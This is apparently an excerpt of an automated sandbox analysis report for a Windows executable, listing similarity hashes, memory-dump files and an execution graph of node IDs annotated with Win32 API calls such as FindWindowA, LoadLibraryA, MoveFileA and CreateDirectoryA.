                                                              • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                              • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                              • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                              • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                              APIs
                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastSleep
                                                              • String ID:
                                                              • API String ID: 1458359878-0
                                                              • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                              • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                              • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                              • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                              Execution Graph

                                                              Execution Coverage:14.5%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:4.3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:74
                                                              execution_graph 52763 40cf00 52764 40cf0d 52763->52764 52766 40cf12 52763->52766 52767 406f50 CloseHandle 52764->52767 52767->52766 52768 492208 52769 49223c 52768->52769 52770 49223e 52769->52770 52771 492252 52769->52771 52914 446fac 18 API calls 52770->52914 52774 49228e 52771->52774 52775 492261 52771->52775 52773 492247 Sleep 52831 4922c5 52773->52831 52780 4922ca 52774->52780 52781 49229d 52774->52781 52776 447008 18 API calls 52775->52776 52778 492270 52776->52778 52782 492278 FindWindowA 52778->52782 52786 4922d9 52780->52786 52787 492320 52780->52787 52904 447008 52781->52904 52784 447288 5 API calls 52782->52784 52814 492289 52784->52814 52785 4922aa 52788 4922b2 FindWindowA 52785->52788 52915 446fac 18 API calls 52786->52915 52792 49237c 52787->52792 52793 49232f 52787->52793 52908 447288 52788->52908 52791 4922e5 52916 446fac 18 API calls 52791->52916 52799 49238b 52792->52799 52805 4923d8 52792->52805 52919 446fac 18 API calls 52793->52919 52796 4922f2 52917 446fac 18 API calls 52796->52917 52797 49233b 52920 446fac 18 API calls 52797->52920 52924 446fac 18 API calls 52799->52924 52801 4922ff 52918 446fac 18 API calls 52801->52918 52803 492348 52921 446fac 18 API calls 52803->52921 52810 492412 52805->52810 52811 4923e7 52805->52811 52806 492397 52925 446fac 18 API calls 52806->52925 52808 49230a SendMessageA 52809 447288 5 API calls 52808->52809 52809->52814 52822 492421 52810->52822 52823 492460 52810->52823 52815 447008 18 API calls 52811->52815 52813 492355 52922 446fac 18 API calls 52813->52922 52814->52831 52818 4923f4 52815->52818 52816 4923a4 52926 446fac 18 API calls 52816->52926 52825 4923fc RegisterClipboardFormatA 52818->52825 52820 492360 PostMessageA 52923 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52820->52923 52821 4923b1 52927 446fac 18 API calls 52821->52927 52929 446fac 18 API calls 52822->52929 52832 49246f 52823->52832 52833 4924b4 52823->52833 52828 447288 5 API calls 52825->52828 52828->52831 52829 4923bc SendNotifyMessageA 52928 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52829->52928 52830 49242d 52930 446fac 18 API calls 52830->52930 52954 403420 52831->52954 52932 446fac 18 API calls 52832->52932 52841 492508 52833->52841 52842 4924c3 52833->52842 52837 49243a 52931 446fac 18 API calls 52837->52931 52839 49247b 52933 446fac 18 API calls 52839->52933 52840 492445 SendMessageA 52844 447288 5 API calls 52840->52844 52851 49256a 52841->52851 52852 492517 52841->52852 52936 446fac 18 API calls 52842->52936 52844->52814 52846 492488 52934 446fac 18 API calls 52846->52934 52847 4924cf 52937 446fac 18 API calls 52847->52937 52850 492493 PostMessageA 52935 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52850->52935 52860 492579 52851->52860 52861 4925f1 52851->52861 52853 447008 18 API calls 52852->52853 52856 492524 52853->52856 52854 4924dc 52938 446fac 18 API calls 52854->52938 52940 42e3a4 SetErrorMode 52856->52940 52859 4924e7 SendNotifyMessageA 52939 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52859->52939 52862 447008 18 API calls 52860->52862 52869 492600 52861->52869 52870 492626 52861->52870 52865 492588 52862->52865 52863 492531 52866 492547 GetLastError 52863->52866 52867 492537 52863->52867 52943 446fac 18 API calls 52865->52943 52871 447288 5 API calls 52866->52871 52868 447288 5 API calls 52867->52868 52872 492545 52868->52872 52948 446fac 18 API calls 52869->52948 52879 492658 52870->52879 52880 492635 52870->52880 52871->52872 52876 447288 5 API calls 52872->52876 52875 49260a FreeLibrary 52949 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52875->52949 52876->52831 52877 49259b GetProcAddress 52882 4925e1 52877->52882 52883 4925a7 52877->52883 52887 492667 52879->52887 52893 49269b 52879->52893 52881 447008 18 API calls 52880->52881 52884 492641 52881->52884 52947 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52882->52947 52944 446fac 18 API calls 52883->52944 52889 492649 CreateMutexA 52884->52889 52950 48c638 18 API calls 52887->52950 52888 4925b3 52945 446fac 18 API calls 52888->52945 52889->52831 52892 4925c0 52896 447288 5 API calls 52892->52896 52893->52831 52952 48c638 18 API calls 52893->52952 52895 492673 52897 492684 OemToCharBuffA 52895->52897 52898 4925d1 52896->52898 52951 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52897->52951 52946 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52898->52946 52901 4926b6 52902 4926c7 CharToOemBuffA 52901->52902 52953 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52902->52953 52905 447010 52904->52905 52958 436088 52905->52958 52907 44702f 52907->52785 52909 447290 52908->52909 53012 4363f0 VariantClear 52909->53012 52911 4472b3 52913 4472ca 52911->52913 53013 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52911->53013 52913->52831 52914->52773 52915->52791 52916->52796 52917->52801 52918->52808 52919->52797 52920->52803 52921->52813 52922->52820 52923->52814 52924->52806 52925->52816 52926->52821 52927->52829 52928->52831 52929->52830 52930->52837 52931->52840 52932->52839 52933->52846 52934->52850 52935->52814 52936->52847 52937->52854 52938->52859 52939->52831 53014 403738 52940->53014 52943->52877 52944->52888 52945->52892 52946->52814 52947->52814 52948->52875 52949->52831 52950->52895 52951->52831 52952->52901 52953->52831 52956 403426 52954->52956 52955 40344b 52956->52955 52957 402660 4 API calls 52956->52957 52957->52956 52959 436094 52958->52959 52960 4360b6 52958->52960 52959->52960 52978 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52959->52978 52961 436139 52960->52961 52962 436121 52960->52962 52963 436115 52960->52963 52964 436109 52960->52964 52965 4360fd 52960->52965 52966 43612d 52960->52966 52987 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52961->52987 52982 403494 52962->52982 52963->52907 52972 403510 4 API calls 52964->52972 52979 403510 52965->52979 52986 4040e8 18 API calls 52966->52986 52971 43614a 52971->52907 52976 436112 52972->52976 52974 436136 52974->52907 52976->52907 52978->52960 52988 4034e0 52979->52988 52983 403498 52982->52983 52984 4034ba 52983->52984 52985 402660 4 API calls 52983->52985 52984->52907 52985->52984 52986->52974 52987->52971 52993 4034bc 52988->52993 52990 4034f0 52998 403400 52990->52998 52994 4034c0 52993->52994 52995 4034dc 52993->52995 53002 402648 52994->53002 52995->52990 52997 4034c9 52997->52990 52999 40341f 52998->52999 53000 403406 52998->53000 52999->52907 53000->52999 53007 402660 53000->53007 53003 40264c 53002->53003 53004 402656 53002->53004 53003->53004 53006 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53003->53006 53004->52997 53004->53004 53006->53004 53008 402664 53007->53008 53009 40266e 53007->53009 53008->53009 53011 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53008->53011 53009->52999 53011->53009 53012->52911 53013->52913 53015 40373c LoadLibraryA 53014->53015 53015->52863 53016 402584 53017 402598 53016->53017 53018 4025ab 53016->53018 53046 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 53017->53046 53019 4025c2 RtlEnterCriticalSection 53018->53019 53020 4025cc 53018->53020 53019->53020 53032 4023b4 13 API calls 53020->53032 53023 40259d 53023->53018 53025 4025a1 53023->53025 53024 4025d5 53026 4025d9 53024->53026 53033 402088 53024->53033 53029 402635 53026->53029 53030 40262b RtlLeaveCriticalSection 53026->53030 53028 4025e5 53028->53026 53047 402210 9 API calls 53028->53047 53030->53029 53032->53024 53034 40209c 53033->53034 53035 4020af 53033->53035 53054 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 53034->53054 53037 4020c6 RtlEnterCriticalSection 53035->53037 53040 4020d0 53035->53040 53037->53040 53038 4020a1 53038->53035 53039 4020a5 53038->53039 53045 402106 53039->53045 53040->53045 53048 401f94 53040->53048 53043 4021f1 RtlLeaveCriticalSection 53044 4021fb 53043->53044 53044->53028 53045->53028 53046->53023 53047->53026 53049 401fa4 53048->53049 53050 401fd0 53049->53050 53053 401ff4 53049->53053 53055 401f0c 53049->53055 53050->53053 53060 401db4 53050->53060 53053->53043 53053->53044 53054->53038 53064 40178c 53055->53064 53059 401f29 53059->53049 53061 401dd2 53060->53061 53062 401e02 53060->53062 53061->53053 53062->53061 53087 401d1c 53062->53087 53068 4017a8 53064->53068 53065 4017b2 53083 401678 VirtualAlloc 53065->53083 53068->53065 53069 40180f 53068->53069 53071 401803 53068->53071 53075 4014e4 53068->53075 53084 4013e0 LocalAlloc 53068->53084 53069->53059 53074 401e80 9 API calls 53069->53074 53085 4015c0 VirtualFree 53071->53085 53072 4017be 53072->53069 53074->53059 53076 4014f3 VirtualAlloc 53075->53076 53078 401520 53076->53078 53079 401543 53076->53079 53086 401398 LocalAlloc 53078->53086 53079->53068 53081 40152c 53081->53079 53082 401530 VirtualFree 53081->53082 53082->53079 53083->53072 53084->53068 53085->53069 53086->53081 53088 401d2e 53087->53088 53089 401d51 53088->53089 53090 401d63 53088->53090 53100 401940 53089->53100 53092 401940 3 API calls 53090->53092 53093 401d61 53092->53093 53094 401d79 53093->53094 53110 401bf8 9 API calls 53093->53110 53094->53061 53096 401d88 53097 401da2 53096->53097 53111 401c4c 9 API calls 53096->53111 53112 401454 LocalAlloc 53097->53112 53101 401966 53100->53101 53109 4019bf 53100->53109 53113 40170c 53101->53113 53105 401983 53106 40199a 53105->53106 53118 4015c0 VirtualFree 53105->53118 53106->53109 53119 401454 LocalAlloc 53106->53119 53109->53093 53110->53096 53111->53097 53112->53094 53114 401743 53113->53114 53115 401783 53114->53115 53116 40175d VirtualFree 53114->53116 53117 4013e0 LocalAlloc 53115->53117 53116->53114 53117->53105 53118->53106 53119->53109 53120 491444 53121 49147e 53120->53121 53122 49148a 53121->53122 53123 491480 53121->53123 53125 491499 53122->53125 53126 4914c2 53122->53126 53316 4090a0 MessageBeep 53123->53316 53128 447008 18 API calls 53125->53128 53133 4914fa 53126->53133 53134 4914d1 53126->53134 53127 403420 4 API calls 53129 491ad6 53127->53129 53130 4914a6 53128->53130 53131 403400 4 API calls 53129->53131 53317 406bb8 53130->53317 53135 491ade 53131->53135 53141 491509 53133->53141 53142 491532 53133->53142 53137 447008 18 API calls 53134->53137 53139 4914de 53137->53139 53325 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53139->53325 53144 447008 18 API calls 53141->53144 53147 49155a 53142->53147 53148 491541 53142->53148 53143 4914e9 53326 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53143->53326 53146 491516 53144->53146 53327 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53146->53327 53155 491569 53147->53155 53156 49158e 53147->53156 53329 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 53148->53329 53151 491521 53328 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53151->53328 53152 491549 53330 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53152->53330 53157 447008 18 API calls 53155->53157 53159 49159d 53156->53159 53160 4915c6 53156->53160 53158 491576 53157->53158 53331 4072b0 53158->53331 53162 447008 18 API calls 53159->53162 53167 4915fe 53160->53167 53168 4915d5 53160->53168 53164 4915aa 53162->53164 53163 49157e 53334 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53163->53334 53335 42c814 53164->53335 53174 49164a 53167->53174 53175 49160d 53167->53175 53170 447008 18 API calls 53168->53170 53172 4915e2 53170->53172 53345 407200 8 API calls 53172->53345 53180 491659 53174->53180 53181 491682 53174->53181 53177 447008 18 API calls 53175->53177 53176 4915ed 53346 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53176->53346 53179 49161c 53177->53179 53182 447008 18 API calls 53179->53182 53183 447008 18 API calls 53180->53183 53188 4916ba 53181->53188 53189 491691 53181->53189 53184 49162d 53182->53184 53185 491666 53183->53185 53347 491148 8 API calls 53184->53347 53349 42c8b4 53185->53349 53197 4916c9 53188->53197 53198 4916f2 53188->53198 53192 447008 18 API calls 53189->53192 53190 491639 53348 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53190->53348 53195 49169e 53192->53195 53355 42c8dc 53195->53355 53200 447008 18 API calls 53197->53200 53203 49172a 53198->53203 53204 491701 53198->53204 53202 4916d6 53200->53202 53364 42c90c LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53202->53364 53211 491739 53203->53211 53212 491762 53203->53212 53206 447008 18 API calls 53204->53206 53208 49170e 53206->53208 53207 4916e1 53365 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53207->53365 53366 42c93c 53208->53366 53214 447008 18 API calls 53211->53214 53217 4917ae 53212->53217 53218 491771 53212->53218 53216 491746 53214->53216 53372 42c964 53216->53372 53224 4917bd 53217->53224 53225 491800 53217->53225 53220 447008 18 API calls 53218->53220 53223 491780 53220->53223 53226 447008 18 API calls 53223->53226 53227 447008 18 API calls 53224->53227 53233 49180f 53225->53233 53234 491873 53225->53234 53228 491791 53226->53228 53229 4917d0 53227->53229 53378 42c508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53228->53378 53231 447008 18 API calls 53229->53231 53235 4917e1 53231->53235 53232 49179d 53379 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53232->53379 53237 447008 18 API calls 53233->53237 53242 4918b2 53234->53242 53243 491882 53234->53243 53380 491340 12 API calls 53235->53380 53239 49181c 53237->53239 53308 42c618 7 API calls 53239->53308 53241 4917ef 53381 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53241->53381 53253 4918f1 53242->53253 53254 4918c1 53242->53254 53244 447008 18 API calls 53243->53244 53247 49188f 53244->53247 53245 49182a 53248 49182e 53245->53248 53249 491863 53245->53249 53384 4528f4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 53247->53384 53252 447008 18 API calls 53248->53252 53383 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53249->53383 53250 491485 53250->53127 53257 49183d 53252->53257 53262 491930 53253->53262 53263 491900 53253->53263 53258 447008 18 API calls 53254->53258 53256 49189c 53385 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53256->53385 53309 452c6c 53257->53309 53261 4918ce 53258->53261 53386 45275c 53261->53386 53273 491978 53262->53273 53274 49193f 53262->53274 53267 447008 18 API calls 53263->53267 53264 4918ad 53264->53250 53265 49184d 53382 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53265->53382 53270 49190d 53267->53270 53269 4918db 53393 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53269->53393 53394 452dfc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53270->53394 53280 4919c0 53273->53280 53281 491987 53273->53281 53276 447008 18 API calls 53274->53276 53275 49191a 53395 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53275->53395 53278 49194e 53276->53278 53279 447008 18 API calls 53278->53279 53282 49195f 53279->53282 53285 4919d3 53280->53285 53292 491a89 53280->53292 53283 447008 18 API calls 53281->53283 53287 447288 5 API calls 53282->53287 53284 491996 53283->53284 53286 447008 18 API calls 53284->53286 53288 447008 18 API calls 53285->53288 53289 4919a7 53286->53289 53287->53250 53290 491a00 53288->53290 53293 447288 5 API calls 53289->53293 53291 447008 18 API calls 53290->53291 53294 491a17 53291->53294 53292->53250 53399 446fac 18 API calls 53292->53399 53293->53250 53396 407de4 7 API calls 53294->53396 53296 491aa2 53400 42e8d8 FormatMessageA 53296->53400 53301 491a39 53302 447008 18 API calls 53301->53302 53303 491a4d 53302->53303 53397 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53303->53397 53305 491a58 53398 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53305->53398 53307 491a64 53308->53245 53405 452710 53309->53405 53311 452c89 53311->53265 53312 452c85 53312->53311 53313 452cad MoveFileA GetLastError 53312->53313 53411 45274c 53313->53411 53316->53250 53318 406bc7 53317->53318 53319 406be0 53318->53319 53320 406be9 53318->53320 53321 403400 4 API calls 53319->53321 53414 403778 53320->53414 53322 406be7 53321->53322 53324 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53322->53324 53324->53250 53325->53143 53326->53250 53327->53151 53328->53250 53329->53152 53330->53250 53332 403738 53331->53332 53333 4072ba SetCurrentDirectoryA 53332->53333 53333->53163 53334->53250 53336 403738 53335->53336 53337 42c837 GetFullPathNameA 53336->53337 53338 42c843 53337->53338 53339 42c85a 53337->53339 53338->53339 53340 42c84b 53338->53340 53341 403494 4 API calls 53339->53341 53342 4034e0 4 API calls 53340->53342 53343 42c858 53341->53343 53342->53343 53344 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53343->53344 53344->53250 53345->53176 53346->53250 53347->53190 53348->53250 53421 42c7ac 53349->53421 53352 403778 4 API calls 53353 42c8d5 53352->53353 53354 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53353->53354 53354->53250 53436 42c684 53355->53436 53358 42c8f0 53361 403400 4 API calls 53358->53361 53359 42c8f9 53360 403778 4 API calls 53359->53360 53362 42c8f7 53360->53362 53361->53362 53363 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53362->53363 53363->53250 53364->53207 53365->53250 53367 42c7ac IsDBCSLeadByte 53366->53367 53368 42c94c 53367->53368 53369 403778 4 API calls 53368->53369 53370 42c95e 53369->53370 53371 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53370->53371 53371->53250 53373 42c7ac IsDBCSLeadByte 53372->53373 53374 42c974 53373->53374 53375 403778 4 API calls 53374->53375 53376 42c985 53375->53376 53377 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53376->53377 53377->53250 53378->53232 53379->53250 53380->53241 53381->53250 53382->53250 53383->53250 53384->53256 53385->53264 53387 452710 2 API calls 53386->53387 53388 452772 53387->53388 53389 452776 53388->53389 53390 452794 CreateDirectoryA GetLastError 53388->53390 53389->53269 53391 45274c Wow64RevertWow64FsRedirection 53390->53391 53392 4527ba 53391->53392 53392->53269 53393->53250 53394->53275 53395->53250 53396->53301 53397->53305 53398->53307 53399->53296 53401 42e8fe 53400->53401 53402 4034e0 4 API calls 53401->53402 53403 42e91b 53402->53403 53404 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53403->53404 53404->53250 53406 45271e 53405->53406 53407 45271a 53405->53407 53408 452727 Wow64DisableWow64FsRedirection 53406->53408 53409 452740 SetLastError 53406->53409 53407->53312 53410 45273b 53408->53410 53409->53410 53410->53312 53412 452751 Wow64RevertWow64FsRedirection 53411->53412 53413 45275b 53411->53413 53412->53413 53413->53265 53415 4037aa 53414->53415 53416 40377d 53414->53416 53417 403400 4 API calls 53415->53417 53416->53415 53418 403791 53416->53418 53420 4037a0 53417->53420 53419 4034e0 4 API calls 53418->53419 53419->53420 53420->53322 53426 42c68c 53421->53426 53423 42c80b 53423->53352 53424 42c7c1 53424->53423 53433 42c454 IsDBCSLeadByte 53424->53433 53429 42c69d 53426->53429 53427 42c701 53430 42c6fc 53427->53430 53435 42c454 IsDBCSLeadByte 53427->53435 53429->53427 53432 42c6bb 53429->53432 53430->53424 53432->53430 53434 42c454 IsDBCSLeadByte 53432->53434 53433->53424 53434->53432 53435->53430 53437 42c68c IsDBCSLeadByte 53436->53437 53438 42c68b 53437->53438 53438->53358 53438->53359 53439 41364c SetWindowLongA GetWindowLongA 53440 4136a9 SetPropA SetPropA 53439->53440 53441 41368b GetWindowLongA 53439->53441 53445 41f3ac 53440->53445 53441->53440 53442 41369a SetWindowLongA 53441->53442 53442->53440 53450 415280 53445->53450 53457 423c1c 53445->53457 53551 423a94 53445->53551 53446 4136f9 53451 41528d 53450->53451 53452 4152f3 53451->53452 53453 4152e8 53451->53453 53456 4152f1 53451->53456 53558 424b9c 13 API calls 53452->53558 53453->53456 53559 41506c 46 API calls 53453->53559 53456->53446 53462 423c52 53457->53462 53460 423cfc 53463 423d03 53460->53463 53464 423d37 53460->53464 53461 423c9d 53465 423ca3 53461->53465 53466 423d60 53461->53466 53484 423c73 53462->53484 53560 423b78 53462->53560 53467 423d09 53463->53467 53502 423fc1 53463->53502 53470 423d42 53464->53470 53471 4240aa IsIconic 53464->53471 53468 423cd5 53465->53468 53469 423ca8 53465->53469 53472 423d72 53466->53472 53473 423d7b 53466->53473 53475 423f23 SendMessageA 53467->53475 53476 423d17 53467->53476 53468->53484 53500 423cee 53468->53500 53501 423e4f 53468->53501 53478 423e06 53469->53478 53479 423cae 53469->53479 53480 4240e6 53470->53480 53481 423d4b 53470->53481 53477 4240be GetFocus 53471->53477 53471->53484 53482 423d88 53472->53482 53483 423d79 53472->53483 53569 4241a4 11 API calls 53473->53569 53475->53484 53476->53484 53503 423cd0 53476->53503 53524 423f66 53476->53524 53477->53484 53488 4240cf 53477->53488 53582 423b94 NtdllDefWindowProc_A 53478->53582 53489 423cb7 53479->53489 53490 423e2e PostMessageA 53479->53490 53604 424860 WinHelpA PostMessageA 53480->53604 53486 4240fd 53481->53486 53481->53503 53570 4241ec IsIconic 53482->53570 53578 423b94 NtdllDefWindowProc_A 53483->53578 53484->53446 53498 424106 53486->53498 53499 42411b 53486->53499 53603 41f004 GetCurrentThreadId 73A25940 53488->53603 53495 423cc0 53489->53495 53496 423eb5 53489->53496 53588 423b94 NtdllDefWindowProc_A 53490->53588 53508 423cc9 53495->53508 53509 423dde IsIconic 53495->53509 53510 423ebe 53496->53510 53511 423eef 53496->53511 53497 423e49 53497->53484 53605 4244e4 53498->53605 53611 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53499->53611 53500->53503 53504 423e1b 53500->53504 53564 423b94 NtdllDefWindowProc_A 53501->53564 53502->53484 53521 423fe7 IsWindowEnabled 53502->53521 53503->53484 53568 423b94 NtdllDefWindowProc_A 53503->53568 53583 424188 53504->53583 53507 4240d6 53507->53484 53519 4240de SetFocus 53507->53519 53508->53503 53527 423da1 53508->53527 53513 423dfa 53509->53513 53514 423dee 53509->53514 53590 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53510->53590 53565 423b94 NtdllDefWindowProc_A 53511->53565 53581 423b94 NtdllDefWindowProc_A 53513->53581 53580 423bd0 15 API calls 53514->53580 53518 423e55 53525 423e93 53518->53525 53526 423e71 53518->53526 53519->53484 53521->53484 53529 423ff5 53521->53529 53524->53484 53540 423f88 IsWindowEnabled 53524->53540 53533 423a94 6 API calls 53525->53533 53589 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53526->53589 53527->53484 53579 422c5c ShowWindow PostMessageA PostQuitMessage 53527->53579 53528 423ec6 53535 423ed8 53528->53535 53591 41ef68 53528->53591 53543 423ffc IsWindowVisible 53529->53543 53530 423ef5 53531 423f0d 53530->53531 53566 41eeb4 GetCurrentThreadId 73A25940 53530->53566 53539 423a94 6 API calls 53531->53539 53542 423e9b PostMessageA 53533->53542 53597 423b94 NtdllDefWindowProc_A 53535->53597 53539->53484 53540->53484 53544 423f96 53540->53544 53541 423e79 PostMessageA 53541->53484 53542->53484 53543->53484 53545 42400a GetFocus 53543->53545 53598 412320 7 API calls 53544->53598 53599 4181f0 53545->53599 53548 42401f SetFocus 53601 415250 53548->53601 53552 423b1d 53551->53552 53553 423aa4 53551->53553 53552->53446 53553->53552 53554 423aaa EnumWindows 53553->53554 53554->53552 53555 423ac6 GetWindow GetWindowLongA 53554->53555 53715 423a2c GetWindow 53554->53715 53556 423ae5 53555->53556 53556->53552 53557 423b11 SetWindowPos 53556->53557 53557->53552 53557->53556 53558->53456 53559->53456 53561 423b82 53560->53561 53562 423b8d 53560->53562 53561->53562 53612 408728 GetSystemDefaultLCID 53561->53612 53562->53460 53562->53461 53564->53518 53565->53530 53567 41ef39 53566->53567 53567->53531 53568->53484 53569->53484 53571 424233 53570->53571 53572 4241fd SetActiveWindow 53570->53572 53571->53484 53687 42365c 53572->53687 53576 42421a 53576->53571 53577 42422d SetFocus 53576->53577 53577->53571 53578->53484 53579->53484 53580->53484 53581->53484 53582->53484 53700 41db40 53583->53700 53586 4241a0 53586->53484 53587 424194 LoadIconA 53587->53586 53588->53497 53589->53541 53590->53528 53592 41ef70 IsWindow 53591->53592 53593 41ef9c 53591->53593 53594 41ef8a 53592->53594 53595 41ef7f EnableWindow 53592->53595 53593->53535 53594->53592 53594->53593 53596 402660 4 API calls 53594->53596 53595->53594 53596->53594 53597->53484 53598->53484 53600 4181fa 53599->53600 53600->53548 53602 41526b SetFocus 53601->53602 53602->53484 53603->53507 53604->53497 53606 4244f0 53605->53606 53607 42450a 53605->53607 53608 42451f 53606->53608 53609 4244f7 SendMessageA 53606->53609 53610 402648 4 API calls 53607->53610 53608->53484 53609->53608 53610->53608 53611->53497 53667 408570 GetLocaleInfoA 53612->53667 53617 408570 5 API calls 53618 40877d 53617->53618 53619 408570 5 API calls 53618->53619 53620 4087a1 53619->53620 53679 4085bc GetLocaleInfoA 53620->53679 53623 4085bc GetLocaleInfoA 53624 4087d1 53623->53624 53625 408570 5 API calls 53624->53625 53626 4087eb 53625->53626 53627 4085bc GetLocaleInfoA 53626->53627 53628 408808 53627->53628 53629 408570 5 API calls 53628->53629 53630 408822 53629->53630 53631 403450 4 API calls 53630->53631 53632 40882f 53631->53632 53633 408570 5 API calls 53632->53633 53634 408844 53633->53634 53635 403450 4 API calls 53634->53635 53636 408851 53635->53636 53637 4085bc GetLocaleInfoA 53636->53637 53638 40885f 53637->53638 53639 408570 5 API calls 53638->53639 53640 408879 53639->53640 53641 403450 4 API calls 53640->53641 53642 408886 53641->53642 53643 408570 5 API calls 53642->53643 53644 40889b 53643->53644 53645 403450 4 API calls 53644->53645 53646 4088a8 53645->53646 53647 408570 5 API calls 53646->53647 53668 408597 53667->53668 53669 4085a9 53667->53669 53670 4034e0 4 API calls 53668->53670 53671 403494 4 API calls 53669->53671 53672 4085a7 53670->53672 53671->53672 53673 403450 53672->53673 53674 403454 53673->53674 53677 403464 53673->53677 53676 4034bc 4 API calls 53674->53676 53674->53677 53675 403490 53675->53617 53676->53677 53677->53675 53678 402660 4 API calls 53677->53678 53678->53675 53680 4085d8 53679->53680 53680->53623 53696 423608 SystemParametersInfoA 53687->53696 53690 423675 ShowWindow 53692 423680 53690->53692 53693 423687 53690->53693 53699 423638 SystemParametersInfoA 53692->53699 53695 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53693->53695 53695->53576 53697 423626 53696->53697 53697->53690 53698 423638 SystemParametersInfoA 53697->53698 53698->53690 53699->53693 53703 41db64 53700->53703 53704 41db4a 53703->53704 53705 41db71 53703->53705 53704->53586 53704->53587 53705->53704 53712 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53705->53712 53707 41db8e 53707->53704 53708 41dba8 53707->53708 53709 41db9b 53707->53709 53713 41bd9c 11 